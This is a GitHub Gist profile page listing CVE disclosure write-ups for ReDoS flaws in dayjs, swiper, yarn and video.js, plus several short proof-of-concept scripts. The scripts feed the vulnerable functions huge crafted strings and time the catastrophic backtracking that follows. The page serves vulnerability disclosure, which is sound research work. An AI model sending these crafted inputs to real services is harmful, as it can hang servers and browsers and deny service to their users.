Skip to content

Instantly share code, notes, and snippets.

View mmmsssttt404's full-sized avatar

mmmsssttt404

3 followers · 2 following
View GitHub Profile
@mmmsssttt404
mmmsssttt404 / README.md
Created October 23, 2025 16:25
CVE-2025-61068

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability has been identified in dayjs/src/constant.js dayjs/src/plugin/localizedFormat/utils.js. The regular expression /\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1,2}|a|A|m{1,2}|s{1,2}|Z{1,2}|SSS/g /(\[[^\]]+])|(MMMM|MM|DD|dddd)/ /(\[[^\]]+])|(LTS?|l{1,4}|L{1,4})/used in the replace() function is susceptible to catastrophic backtracking, which can lead to excessive CPU consumption and cause the browser or Node.js environment to hang.

Vulnerability Details

File: dayjs/src/constant.js dayjs/src/plugin/localizedFormat/utils.js

Link to code: https://github.com/iamkun/dayjs/blob/6e831280f010353e298c131cf54c922c5ac8fc82/src/constant.js#L30 https://github.com/iamkun/dayjs/blob/6e831280f010353e298c131cf54c922c5ac8fc82/src/plugin/localizedFormat/utils.js#L3

@mmmsssttt404
mmmsssttt404 / README.md
Created October 23, 2025 16:13
CVE-2025-61066

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability has been identified in swiper/src/shared/get-device.mjs. The regular expression /(iPad).*OS\s([\d_]+)/ used in the match() function is susceptible to catastrophic backtracking, which can lead to excessive CPU consumption and cause the browser or Node.js environment to hang.

Vulnerability Details

File: swiper/src/shared/get-device.mjs

Link to code: https://github.com/nolimits4web/swiper/blob/39cd7f57b5f99592f468aa52d9c5820e2c54d626/src/shared/get-device.mjs#L21

@mmmsssttt404
mmmsssttt404 / README.md
Created October 23, 2025 15:30
CVE-2025-61065

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability has been identified in yarn/src/util/normalize-manifest/util.js. The regular expression /<([^>]+)>/ used in the match() function is susceptible to catastrophic backtracking, which can lead to excessive CPU consumption and cause the browser or Node.js environment to hang.

Vulnerability Details

File: yarn/src/util/normalize-manifest/util.js

Link to code: https://github.com/yarnpkg/yarn/blob/7cafa512a777048ce0b666080a24e80aae3d66a9/src/util/normalize-manifest/util.js#L57

@mmmsssttt404
mmmsssttt404 / README.md
Last active October 23, 2025 15:16
CVE-2025-61064

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability has been identified in video.js/build/jsdoc-typeof-plugin.js. The regular expression /\{.*typeof\s+([^\s\|]+).*\}/ used in the .replace() function is susceptible to catastrophic backtracking, which can lead to excessive CPU consumption and cause the browser or Node.js environment to hang.

Vulnerability Details

File: video.js/build/jsdoc-typeof-plugin.js

Link to code: https://github.com/videojs/video.js/blob/3380d33d6f9c2c22a50b35a759519b90723f33a4/build/jsdoc-typeof-plugin.js#L6

@mmmsssttt404
mmmsssttt404 / poc.js
Created August 19, 2025 11:43
video.js ReDos
const { test } = require('shelljs');
const { handlers } = require('./jsdoc-typeof-plugin');
const evt = { comment: ""+"{".repeat(100000)+"t" };
const startTime = performance.now();
handlers.jsdocCommentFound(evt);
const endTime = performance.now();
const timeTaken = endTime - startTime;
console.log(` time taken: ${timeTaken.toFixed(3)} ms`);
@mmmsssttt404
mmmsssttt404 / poc.js
Created May 21, 2025 04:50
ReDos
// test-amp.js
const ampComponents = require('./amp_components');
const {settingsCache} = require('../../../../services/proxy');
const maliciousIframe = '<iframe' + '\t'.repeat(100000) + '@';
const fakeContext = {
post: {
html: `<p> ${maliciousIframe}</p>`
},
html: `<p>${maliciousIframe}</p>`,
@mmmsssttt404
mmmsssttt404 / poc.js
Created May 6, 2025 11:43
ReDos
const HtmlPwaPlugin = require('./HtmlPwaPlugin')
const HtmlWebpackPlugin = require('html-webpack-plugin')
HtmlWebpackPlugin.getHooks = () => ({
beforeEmit: {
tapAsync: (id, handler) => {
const hugeHtml = '<link rel="icon"'.repeat(100000) + '\u0000';
const data = { html: hugeHtml };
handler(data, (err, result) => {
});
@mmmsssttt404
mmmsssttt404 / poc.js
Last active April 29, 2025 08:35
ReDos
const { default: transform } = require('../dist/index.js');
const bigValue = '0'.repeat(100000) + 'p';
const cssString = `
.foo {
some-prop: "${bigValue}";
}
`
const startTime = performance.now();
@mmmsssttt404
mmmsssttt404 / poc.js
Created April 15, 2025 13:59
ReDos
import { getDevice } from './get-device.mjs';
const str = ""+"iPad".repeat(100000)+"\u0000";
const startTime = performance.now();
const deviceInfo = getDevice({ userAgent: str });
const endTime = performance.now();
const timeTaken = endTime - startTime;
@mmmsssttt404
mmmsssttt404 / poc.js
Created April 2, 2025 04:38
ReDos
const parseMessage = require('./parseMessage')
const validLine =
':' + 'myNick!user@host' + ' ' +
'PRIVMSG' + ' ' +
'#channel' + ' ' +
'Hello ' +""+" ".repeat(100000)+"\u0000"+ 'Trailing';
const startTime = performance.now();